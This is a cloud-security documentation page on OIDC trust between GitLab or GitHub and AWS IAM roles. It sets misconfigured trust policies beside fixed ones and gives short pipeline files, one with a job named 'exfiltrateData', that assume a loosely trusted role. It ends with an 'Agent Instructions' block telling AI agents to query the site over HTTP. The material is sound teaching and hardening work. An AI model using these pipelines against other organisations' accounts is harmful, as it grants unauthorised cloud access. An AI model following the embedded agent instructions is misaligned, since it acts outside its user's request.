# OpenID Connect (OIDC) ## What is OIDC? * [OpenID Connect](https://openid.net/developers/how-connect-works/#:~:text=It%20is%20easy%2C%20reliable%2C%20secure,the%20most%20expert%20service%20providers.) is an authentication protocol based on the OAuth 2.0 framework that eliminates the need for storing and managing passwords * Within AWS, an Identity Provider can be configured for OIDC ID Federation between AWS and the service * An IAM Role along with its Trust Policy and Permissions policy is created and tied to the Identity Provider *** ## GitLab OIDC with AWS * GitLab and AWS can integrate via OIDC, allowing GitLab pipelines to authenticate and assume an IAM Role within AWS to manage or deploy resources securely * If the Role's Trust Policy is misconfigured (or otherwise poorly configured), **any** GitLab pipeline could authenticate to the AWS account (assuming the attacker has identified the AWS Account ID and IAM Role name), exposing its permissions to attackers ### GitLab AWS IAM Role Misconfigured Trust Policy * This IAM Role Trust Policy allows any connection from GitLab.com {% code overflow="wrap" %} ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Federated": "arn:aws:iam::123456789012:oidc-provider/gitlab.com" }, "Action": "sts:AssumeRoleWithWebIdentity", "Condition": { "StringEquals": { "gitlab.com:aud": "https://gitlab.com" } } } ] } ``` {% endcode %} ### GitLab AWS IAM Role Secure Trust Policy * To resolve this, it's important to specify [additional conditions](https://docs.gitlab.com/ee/ci/cloud_services/index.html#configure-a-conditional-role-with-oidc-claims) in the IAM Role's Trust Policy e.g., {% code overflow="wrap" %} ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Federated": "arn:aws:iam::123456789012:oidc-provider/gitlab.com" }, "Action": "sts:AssumeRoleWithWebIdentity", "Condition": { "StringEquals": { "gitlab.com:aud": "https://gitlab.com", "gitlab.com:sub": "project_path:Engineering/AWS-Deployments:ref_type:branch:ref:main" } } } ] } ``` {% endcode %} * This new Trust Policy only allows requests coming from the GitLab Group "Engineering" from the Project "AWS-Deployments" from the "main" branch ### GitLab Exploiting the Misconfigured Trust Policy {% hint style="warning" %} CI/CD Variables are also needed for this to work. See my [blog post here](https://blog.pwnedlabs.io/abusing-identity-providers-in-aws) for setup. {% endhint %} ```yaml # .gitlab-ci.yml file variables: AWS_DEFAULT_REGION: us-east-1 AWS_PROFILE: "oidc" oidc: image: name: amazon/aws-cli:latest entrypoint: [""] id_tokens: GITLAB_OIDC_TOKEN: aud: https://gitlab.com script: - aws sts get-caller-identity ``` *** ## GitHub Actions OIDC with AWS * GitHub and AWS can integrate via OIDC, allowing GitHub pipelines to authenticate and assume an IAM Role within AWS to manage or deploy resources securely * If the Role's Trust Policy is misconfigured (or otherwise poorly configured), **any** GitHub pipeline could authenticate to the AWS account (assuming the attacker has identified the AWS Account ID and IAM Role name), exposing its permissions to attackers ### GitHub Actions AWS IAM Role Misconfigured Trust Policy This IAM Role Trust Policy allows any connection from GitHub.com {% code overflow="wrap" %} ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Federated": "arn:aws:iam::012345678910:oidc-provider/token.actions.githubusercontent.com" }, "Action": "sts:AssumeRoleWithWebIdentity", "Condition": { "StringEquals": { "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" } } } ] } ``` {% endcode %} ### GitHub Actions AWS IAM Role Secure Trust Policy * To resolve this, it's important to specify [additional conditions](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_create_for-idp_oidc.html#idp_oidc_Create_GitHub) in the IAM Role's Trust Policy e.g., {% code overflow="wrap" %} ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Federated": "arn:aws:iam::012345678910:oidc-provider/token.actions.githubusercontent.com" }, "Action": "sts:AssumeRoleWithWebIdentity", "Condition": { "StringEquals": { "token.actions.githubusercontent.com:aud": "sts.amazonaws.com", "token.actions.githubusercontent.com:sub": "repo:MyOrg/MyRepo:ref:refs/heads/main" } } } ] } ``` {% endcode %} ### GitHub Actions Exploiting the Misconfigured Trust Policy ```yaml # .github/workflows/main.yml name: AWS example workflow on: push env: AWS_REGION : "us-east-1" # permission can be added at job level or workflow level permissions: id-token: write # This is required for requesting the JWT contents: read # This is required for actions/checkout jobs: exfiltrateData: runs-on: ubuntu-latest steps: - name: Git clone the repository uses: actions/checkout@v4 - name: configure aws credentials uses: aws-actions/configure-aws-credentials@v4.0.2 with: role-to-assume: arn:aws:iam::123456789012:role/github # replace with IAM role to assume role-session-name: github-role # can be named whatever, shows in AWS logs aws-region: ${{ env.AWS_REGION }} - name: get role identity run: | aws sts get-caller-identity ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.techwithtyler.dev/cloud-security/aws/aws-offensive-security/aws-privilege-escalation/openid-connect-oidc.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.